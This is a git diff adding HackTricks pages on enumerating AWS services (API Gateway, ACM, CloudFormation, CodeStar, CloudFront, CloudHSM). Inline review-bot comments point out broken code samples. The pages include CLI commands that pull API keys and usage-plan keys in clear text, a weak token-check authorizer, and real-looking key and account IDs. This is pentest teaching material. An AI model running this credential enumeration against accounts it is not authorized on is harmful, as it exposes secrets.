+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Types of services + +### Container services + +Services that fall under container services have the following characteristics: + +* The service itself runs on **separate infrastructure instances**, such as EC2. +* **AWS** is responsible for **managing the operating system and the platform**. +* A managed service is provided by AWS, which is typically the service itself for the **actual application which are seen as containers**. +* As a user of these container services, you have a number of management and security responsibilities, including **managing network access security, such as network access control list rules and any firewalls**. +* Also, platform-level identity and access management where it exists. +* **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk. + +### Abstract Services + +* These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**. +* The services are accessed via endpoints using AWS application programming interfaces, APIs. +* The **underlying infrastructure, operating system, and platform is managed by AWS**. +* The abstracted services provide a multi-tenancy platform on which the underlying infrastructure is shared. +* **Data is isolated via security mechanisms**. +* Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS. + +## Services Enumeration + +**The pages of this section are ordered by AWS service. 
In there you will be able to find information about the service (how it works and capabilities) and that will allow you to escalate privileges.** + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md b/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md new file mode 100644 index 0000000000..6a7b8d82f0 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md @@ -0,0 +1,323 @@ +# AWS - API Gateway Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## API Gateway + +### Basic Information + +AWS API Gateway is a comprehensive service offered by Amazon Web Services (AWS) designed for developers to **create, publish, and oversee APIs on a large scale**. It functions as an entry point to an application, permitting developers to establish a framework of rules and procedures. This framework governs the access external users have to certain data or functionalities within the application. + +API Gateway enables you to define **how requests to your APIs should be handled**, and it can create custom API endpoints with specific methods (e.g., GET, POST, PUT, DELETE) and resources. It can also generate client SDKs (Software Development Kits) to make it easier for developers to call your APIs from their applications. + +### API Gateways Types + +* **HTTP API**: Build low-latency and cost-effective REST APIs with built-in features such as OIDC and OAuth2, and native CORS support. Works with the following: Lambda, HTTP backends. +* **WebSocket API**: Build a WebSocket API using persistent connections for real-time use cases such as chat applications or dashboards. Works with the following: Lambda, HTTP, AWS Services. +* **REST API**: Develop a REST API where you gain complete control over the request and response along with API management capabilities. Works with the following: Lambda, HTTP, AWS Services. +* **REST API Private**: Create a REST API that is only accessible from within a VPC. + +### API Gateway Main Components + +1. **Resources**: In API Gateway, resources are the components that **make up the structure of your API**. They represent **the different paths or endpoints** of your API and correspond to the various actions that your API supports. A resource is each method (e.g., GET, POST, PUT, DELETE) **inside each path** (/, or /users, or /user/{id}. +2. **Stages**: Stages in API Gateway represent **different versions or environments** of your API, such as development, staging, or production. 
You can use stages to manage and deploy **multiple versions of your API simultaneousl**y, allowing you to test new features or bug fixes without affecting the production environment. Stages also **support stage variables**, which are key-value pairs that can be used to configure the behavior of your API based on the current stage. For example, you could use stage variables to direct API requests to different Lambda functions or other backend services depending on the stage. + * The stage is indicated at the beggining of the URL of the API Gateway endpoint. +3. **Authorizers**: Authorizers in API Gateway are responsible for **controlling access to your API** by verifying the identity of the caller before allowing the request to proceed. You can use **AWS Lambda functions** as custom authorizers, which allows you to implement your own authentication and authorization logic. When a request comes in, API Gateway passes the request's authorization token to the Lambda authorizer, which processes the token and returns an IAM policy that determines what actions the caller is allowed to perform. API Gateway also supports **built-in authorizers**, such as **AWS Identity and Access Management (IAM)** and **Amazon Cognito**. +4. **Resource Policy**: A resource policy in API Gateway is a JSON document that **defines the permissions for accessing your API**. It is similar to an IAM policy but specifically tailored for API Gateway. You can use a resource policy to control who can access your API, which methods they can call, and from which IP addresses or VPCs they can connect. **Resource policies can be used in combination with authorizers** to provide fine-grained access control for your API. + * In order to make effect the API needs to be **deployed again after** the resource policy is modified. + +### Logging + +By default, **CloudWatch Logs** are **off**, **Access Logging** is **off**, and **X-Ray tracing** is also **off**. 
+ +### Enumeration + +{% hint style="success" %} +Note that in both AWS apis to enumerate resources (**`apigateway`** and **`apigatewayv2`**) the only permission you need and the only read permission grantable is **`apigateway:GET`**, with that you can **enumerate everything.** +{% endhint %} + +{% tabs %} +{% tab title="apigateway" %} +```bash +# Generic info +aws apigateway get-account +aws apigateway get-domain-names +aws apigateway get-usage-plans +aws apigateway get-vpc-links +aws apigateway get-client-certificates + +# Enumerate APIs +aws apigateway get-rest-apis # This will also show the resource policy (if any) +## Get stages +aws apigateway get-stages --rest-api-id +## Get resources +aws apigateway get-resources --rest-api-id +## Get API resource action per HTTP verb (check authorizers and api key required) +aws apigateway get-method --http-method GET --rest-api-id --resource-id + +## Call API +https://.execute-api..amazonaws.com// +## API authorizers +aws apigateway get-authorizers --rest-api-id +## Models +aws apigateway get-models --rest-api-id +## More info +aws apigateway get-gateway-responses --rest-api-id +aws apigateway get-request-validators --rest-api-id +aws apigateway get-deployments --rest-api-id + +# Get api keys generated +aws apigateway get-api-keys --include-value +aws apigateway get-api-key --api-key --include-value # Get just 1 +## Example use API key +curl -X GET -H "x-api-key: AJE&Ygenu4[..]" https://e83uuftdi8.execute-api.us-east-1.amazonaws.com/dev/test +## Usage plans +aws apigateway get-usage-plans #Get limit use info +aws apigateway get-usage-plan-keys --usage-plan-id #Get clear text values of api keys +aws apigateway get-usage-plan-key --usage-plan-id --key-id +###Already consumed +aws apigateway get-usage --usage-plan-id --start-date 2023-07-01 --end-date 2023-07-12 +``` +{% endtab %} + +{% tab title="apigatewayv2" %} +```bash +# Generic info +aws apigatewayv2 get-domain-names +aws apigatewayv2 get-domain-name --domain-name +aws 
apigatewayv2 get-vpc-links + +# Enumerate APIs +aws apigatewayv2 get-apis # This will also show the resource policy (if any) +aws apigatewayv2 get-api --api-id + +## Get all the info from an api at once +aws apigatewayv2 export-api --api-id --output-type YAML --specification OAS30 /tmp/api.yaml + +## Get stages +aws apigatewayv2 get-stages --api-id + +## Get routes +aws apigatewayv2 get-routes --api-id +aws apigatewayv2 get-route --api-id --route-id + +## Get deployments +aws apigatewayv2 get-deployments --api-id +aws apigatewayv2 get-deployment --api-id --deployment-id + +## Get integrations +aws apigatewayv2 get-integrations --api-id + +## Get authorizers +aws apigatewayv2 get-authorizers --api-id +aws apigatewayv2 get-authorizer --api-id --authorizer-id + +## Get domain mappings +aws apigatewayv2 get-api-mappings --api-id --domain-name +aws apigatewayv2 get-api-mapping --api-id --api-mapping-id --domain-name + +## Get models +aws apigatewayv2 get-models --api-id + +## Call API +https://.execute-api..amazonaws.com// +``` +{% endtab %} +{% endtabs %} + +## Different Authorizations to access API Gateway endpoints + +### Resource Policy + +It's possible to use resource policies to define who could call the API endpoints.\ +In the following example you can see that the **indicated IP cannot call** the endpoint `/resource_policy` via GET. + +
+ +### IAM Authorizer + +It's possible to set that a methods inside a path (a resource) requires IAM authentication to call it. + +
+ +When this is set you will receive the error `{"message":"Missing Authentication Token"}` when you try to reach the endpoint without any authorization. + +One easy way to generate the expected token by the application is to use **curl**. + +```bash +$ curl -X https://.execute-api..amazonaws.com// --user : --aws-sigv4 "aws:amz::execute-api" +``` + +Another way is to use the **`Authorization`** type **`AWS Signature`** inside **Postman**. + +
+ +Set the accessKey and the SecretKey of the account you want to use and you can know authenticate against the API endpoint. + +Both methods will generate an **Authorization** **header** such as: + +``` +AWS4-HMAC-SHA256 Credential=AKIAYY7XU6ECUDOTWB7W/20220726/us-east-1/execute-api/aws4_request, SignedHeaders=host;x-amz-date, Signature=9f35579fa85c0d089c5a939e3d711362e92641e8c14cc571df8c71b4bc62a5c2 +``` + +Note that in other cases the **Authorizer** might have been **bad coded** and just sending **anything** inside the **Authorization header** will **allow to see the hidden content**. + +### Request Signing Using Python + +```python + +pip install requests +pip install requests-aws4auth +pip install boto3 + +import boto3 +import requests +from requests_aws4auth import AWS4Auth + +region = 'us-east-1' # Region +service = 'execute-api' +access_key = 'YOUR_ACCESS_KEY' +secret_key = 'YOUR_SECRET_KEY' + +url = 'https://.execute-api.us-east-1.amazonaws.com//' + +session = boto3.Session(aws_access_key_id=access_key, aws_secret_access_key=secret_key) +credentials = session.get_credentials() +awsauth = AWS4Auth(credentials.access_key, credentials.secret_key, region, service, session_token=credentials.token) + +response = requests.get(url, auth=awsauth) + +print(response.text) + +``` + +### Custom Lambda Authorizer + +It's possible to use a lambda that based in a given token will **return an IAM policy** indicating if the user is **authorized to call the API endpoint**.\ +You can set each resource method that will be using the authoriser. + +
+ +Lambda Authorizer Code Example + +```python +import json + +def lambda_handler(event, context): + token = event['authorizationToken'] + method_arn = event['methodArn'] + + if not token: + return { + 'statusCode': 401, + 'body': 'Unauthorized' + } + + try: + # Replace this with your own token validation logic + if token == "your-secret-token": + return generate_policy('user', 'Allow', method_arn) + else: + return generate_policy('user', 'Deny', method_arn) + except Exception as e: + print(e) + return { + 'statusCode': 500, + 'body': 'Internal Server Error' + } + +def generate_policy(principal_id, effect, resource): + policy = { + 'principalId': principal_id, + 'policyDocument': { + 'Version': '2012-10-17', + 'Statement': [ + { + 'Action': 'execute-api:Invoke', + 'Effect': effect, + 'Resource': resource + } + ] + } + } + return policy +``` + +
+ +Call it with something like: + +
curl "https://jhhqafgh6f.execute-api.eu-west-1.amazonaws.com/prod/custom_auth" -H 'Authorization: your-secret-token'
+
+ +{% hint style="warning" %} +Depending on the Lambda code, this authorization might be vulnerable +{% endhint %} + +Note that if a **deny policy is generated and returned** the error returned by API Gateway is: `{"Message":"User is not authorized to access this resource with an explicit deny"}` + +This way you could **identify this authorization** being in place. + +### Required API Key + +It's possible to set API endpoints that **require a valid API key** to contact it. + +
+ +It's possible to generate API keys in the API Gateway portal and even set how much it can be used (in terms of requests per second and in terms of requests per month). + +To make an API key work, you need to add it to a **Usage Plan**, this usage plan mus be added to the **API Stage** and the associated API stage needs to have a configured a **method throttling** to the **endpoint** requiring the API key: + +
+ +## Unauthenticated Access + +{% content-ref url="../aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md" %} +[aws-api-gateway-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md) +{% endcontent-ref %} + +## Privesc + +{% content-ref url="../aws-privilege-escalation/aws-apigateway-privesc.md" %} +[aws-apigateway-privesc.md](../aws-privilege-escalation/aws-apigateway-privesc.md) +{% endcontent-ref %} + +## Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-api-gateway-post-exploitation.md" %} +[aws-api-gateway-post-exploitation.md](../aws-post-exploitation/aws-api-gateway-post-exploitation.md) +{% endcontent-ref %} + +## Persistence + +{% content-ref url="../aws-persistence/aws-api-gateway-persistence.md" %} +[aws-api-gateway-persistence.md](../aws-persistence/aws-api-gateway-persistence.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md b/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md new file mode 100644 index 0000000000..52437363f7 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md @@ -0,0 +1,87 @@ +# AWS - Certificate Manager (ACM) & Private Certificate Authority (PCA) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
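Review bot: In aws-api-gateway-enum.md, the "Custom Lambda Authorizer" example returns `{'statusCode': 401, 'body': 'Unauthorized'}` (and a similar 500 dict) from a REST API Lambda authorizer, which is not a valid authorizer response: the function must return an object with `principalId` and `policyDocument`, and the documented way to make API Gateway answer 401 is `raise Exception('Unauthorized')`; a plain HTTP-style dict is treated as a malformed policy and surfaces as a 500, so the 401 branch never behaves as the comment implies. Two smaller points in the same hunk: the IAM example `curl -X https://...execute-api...` passes the URL as the argument of `-X`, so drop `-X` or write `-X GET` (the `--user :` and `aws:amz::execute-api` placeholders for credentials and region also appear to have been stripped and should be restored as `<access_key>:<secret_key>` and `aws:amz:<region>:execute-api`); and the "Request Signing Using Python" block puts three `pip install` lines inside a ```python fence, which makes the snippet fail on the first line, so move them to a separate bash block or a comment. The signed-header sample also embeds a real-looking access key id (`AKIAYY7XU6ECUDOTWB7W`) and the API key example a live-looking API id; use obvious placeholders. Typos: "beggining", "simultaneousl**y" (bold closes mid-word), "authoriser", "mus be", and "you can know authenticate" should be "you can now authenticate".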
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +**AWS Certificate Manager (ACM)** is provided as a service aimed at streamlining the **provisioning, management, and deployment of SSL/TLS certificates** for AWS services and internal resources. The necessity for manual processes, such as purchasing, uploading, and certificate renewals, is **eliminated** by ACM. This allows users to efficiently request and implement certificates on various AWS resources including **Elastic Load Balancers, Amazon CloudFront distributions, and APIs on API Gateway**. + +A key feature of ACM is the **automatic renewal of certificates**, significantly reducing the management overhead. Furthermore, ACM supports the creation and centralized management of **private certificates for internal use**. Although SSL/TLS certificates for integrated AWS services like Elastic Load Balancing, Amazon CloudFront, and Amazon API Gateway are provided at no extra cost through ACM, users are responsible for the costs associated with the AWS resources utilized by their applications and a monthly fee for each **private Certificate Authority (CA)** and private certificates used outside integrated ACM services. + +**AWS Private Certificate Authority** is offered as a **managed private CA service**, enhancing ACM's capabilities by extending certificate management to include private certificates. These private certificates are instrumental in authenticating resources within an organization. 
+ +## Enumeration + +### ACM + +```bash +# List certificates +aws acm list-certificates + +# Get certificate info +aws acm describe-certificate --certificate-arn # Check "InUseBy" to check which resources are using it + +# Get certificate data +aws acm get-certificate --certificate-arn "arn:aws:acm:us-east-1:188868097724:certificate/865abced-82c9-43bf-b7d2-1f4948bf353d" + +# Account configuration +aws acm get-account-configuration +``` + +### PCM + +```bash +# List CAs +aws acm-pca list-certificate-authorities + +# Get CA info +aws acm-pca describe-certificate-authority --certificate-authority-arn + +# Get CA Permissions +aws acm-pca list-permissions --certificate-authority-arn + +# Get CA certificate +aws acm-pca get-certificate-authority-certificate --certificate-authority-arn + +# Certificate request +aws acm-pca get-certificate-authority-csr --certificate-authority-arn + +# Get CA Policy (if any) +aws acm-pca get-policy --resource-arn +``` + +## Privesc + +TODO + +## Post Exploitation + +TODO + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md b/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md new file mode 100644 index 0000000000..a4e9343ab0 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md @@ -0,0 +1,101 @@ +# AWS - CloudFormation & Codestar Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
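Review bot: In aws-certificate-manager-acm-and-private-certificate-authority-pca.md, the "### PCM" heading above the `aws acm-pca` commands should be "### PCA" (Private Certificate Authority), matching the page title and the CLI namespace. The `get-certificate` example also hard-codes what looks like a real account id and certificate id in the ARN (`arn:aws:acm:us-east-1:188868097724:certificate/865abced-...`) while every other command in the block uses a placeholder; replace it with a placeholder ARN. The "Privesc" and "Post Exploitation" sections are bare "TODO" and will render as empty headings; either fill them with a content-ref like the other service pages or drop them until content exists.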
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## CloudFormation + +AWS CloudFormation is a service designed to **streamline the management of AWS resources**. It enables users to focus more on their applications running in AWS by **minimizing the time spent on resource management**. The core feature of this service is the **template**—a descriptive model of the desired AWS resources. Once this template is provided, CloudFormation is responsible for the **provisioning and configuration** of the specified resources. This automation facilitates a more efficient and error-free management of AWS infrastructure. + +### Enumeration + +```bash +# Stacks +aws cloudformation list-stacks +aws cloudformation describe-stacks # You could find sensitive information here +aws cloudformation list-stack-resources --stack-name +aws cloudformation get-template --stack-name cloudformationStack +aws cloudformation describe-stack-events --stack-name cloudformationStack + +## Show params and outputs +aws cloudformation describe-stacks | jq ".Stacks[] | .StackId, .StackName, .Parameters, .Outputs" + +# Export +aws cloudformation list-exports +aws cloudformation list-imports --export-name + +# Stack Sets +aws cloudformation list-stack-sets +aws cloudformation describe-stack-set --stack-set-name +aws cloudformation list-stack-instances --stack-set-name +aws cloudformation list-stack-set-operations --stack-set-name +aws cloudformation list-stack-set-operation-results --stack-set-name --operation-id +``` + +### Privesc + +In the following page you can check how to **abuse cloudformation permissions to escalate privileges**: + +{% content-ref url="../aws-privilege-escalation/aws-cloudformation-privesc/" %} +[aws-cloudformation-privesc](../aws-privilege-escalation/aws-cloudformation-privesc/) +{% endcontent-ref %} + +### Post-Exploitation + +Check for **secrets** or sensitive information in the **template, parameters & output** of each CloudFormation + +## Codestar + +AWS CodeStar is a service for creating, managing, and 
working with software development projects on AWS. You can quickly develop, build, and deploy applications on AWS with an AWS CodeStar project. An AWS CodeStar project creates and **integrates AWS services** for your project development toolchain. Depending on your choice of AWS CodeStar project template, that toolchain might include source control, build, deployment, virtual servers or serverless resources, and more. AWS CodeStar also **manages the permissions required for project users** (called team members). + +### Enumeration + +```bash +# Get projects information +aws codestar list-projects +aws codestar describe-project --id +aws codestar list-resources --project-id +aws codestar list-team-members --project-id + + aws codestar list-user-profiles + aws codestar describe-user-profile --user-arn +``` + +### Privesc + +In the following page you can check how to **abuse codestar permissions to escalate privileges**: + +{% content-ref url="../aws-privilege-escalation/aws-codestar-privesc/" %} +[aws-codestar-privesc](../aws-privilege-escalation/aws-codestar-privesc/) +{% endcontent-ref %} + +## References + +* [https://docs.aws.amazon.com/cloudformation/](https://docs.aws.amazon.com/cloudformation/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md b/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md new file mode 100644 index 0000000000..d80ef3c21b --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md @@ -0,0 +1,70 @@ +# AWS - CloudFront Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
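Review bot: In aws-cloudformation-and-codestar-enum.md, the last two commands of the Codestar enumeration block (`aws codestar list-user-profiles` and `describe-user-profile`) carry a leading space, so they are indented differently from the rest of the block and copy into the shell that way; dedent them. The "Post-Exploitation" sentence "of each CloudFormation" is missing its noun and should read "of each CloudFormation stack". The "## Codestar" heading should be "CodeStar" to match the prose and the product name. The References list only cites the CloudFormation documentation; the CodeStar paragraph reads as documentation text, so add its source URL alongside.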
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## CloudFront + +CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3. + +The log files capture data over a period of time and depending on the amount of requests that are received by Amazon CloudFront for that distribution will depend on the amount of log fils that are generated. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered to once the log file is full. **Amazon CloudFront retains these logs until they are ready to be delivered to S3**. Again, depending on the size of these log files this delivery can take **between one and 24 hours**. + +**By default cookie logging is disabled** but you can enable it. + +### Functions + +You can create functions in CloudFront. These functions will have its **endpoint in cloudfront** defined and will run a declared **NodeJS code**. This code will run inside a **sandbox** in a machine running under an AWS managed machine (you would need a sandbox bypass to manage to escape to the underlaying OS). + +As the functions aren't run in the users AWS account. no IAM role is attached so no direct privesc is possible abusing this feature. 
+ +### Enumeration + +```bash +aws cloudfront list-distributions +aws cloudfront get-distribution --id # Just get 1 +aws cloudfront get-distribution-config --id + +aws cloudfront list-functions +aws cloudfront get-function --name TestFunction function_code.js + +aws cloudfront list-distributions | jq ".DistributionList.Items[] | .Id, .Origins.Items[].Id, .Origins.Items[].DomainName, .AliasICPRecordals[].CNAME" +``` + +## Unauthenticated Access + +{% content-ref url="../aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md" %} +[aws-cloudfront-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md) +{% endcontent-ref %} + +## Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-cloudfront-post-exploitation.md" %} +[aws-cloudfront-post-exploitation.md](../aws-post-exploitation/aws-cloudfront-post-exploitation.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md b/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md new file mode 100644 index 0000000000..91f30bd3e6 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md @@ -0,0 +1,93 @@ +# AWS - CloudHSM Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
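Review bot: In aws-cloudfront-enum.md, the "Functions" paragraph states that CloudFront functions run "a declared NodeJS code"; CloudFront Functions execute in a purpose-built lightweight JavaScript runtime, not Node.js (Node.js is the runtime of Lambda@Edge), so say "JavaScript" here, or name Lambda@Edge explicitly if that is what the sandbox-escape remark refers to. Wording in the logging paragraph: "you will be stored for the storage used by S3" should be "you will be charged for the storage used by S3", "log fils" should be "log files", and "the users AWS account. no IAM role is attached" should read "the user's AWS account, no IAM role is attached".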
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## HSM - Hardware Security Module + +Cloud HSM is a FIPS 140 level two validated **hardware device** for secure cryptographic key storage (note that CloudHSM is a hardware appliance, it is not a virtualized service). It is a SafeNetLuna 7000 appliance with 5.3.13 preloaded. There are two firmware versions and which one you pick is really based on your exact needs. One is for FIPS 140-2 compliance and there was a newer version that can be used. + +The unusual feature of CloudHSM is that it is a physical device, and thus it is **not shared with other customers**, or as it is commonly termed, multi-tenant. It is dedicated single tenant appliance exclusively made available to your workloads + +Typically, a device is available within 15 minutes assuming there is capacity, but in some zones there could not be. + +Since this is a physical device dedicated to you, **the keys are stored on the device**. Keys need to either be **replicated to another device**, backed up to offline storage, or exported to a standby appliance. **This device is not backed** by S3 or any other service at AWS like KMS. + +In **CloudHSM**, you have to **scale the service yourself**. You have to provision enough CloudHSM devices to handle whatever your encryption needs are based on the encryption algorithms you have chosen to implement for your solution.\ +Key Management Service scaling is performed by AWS and automatically scales on demand, so as your use grows, so might the number of CloudHSM appliances that are required. 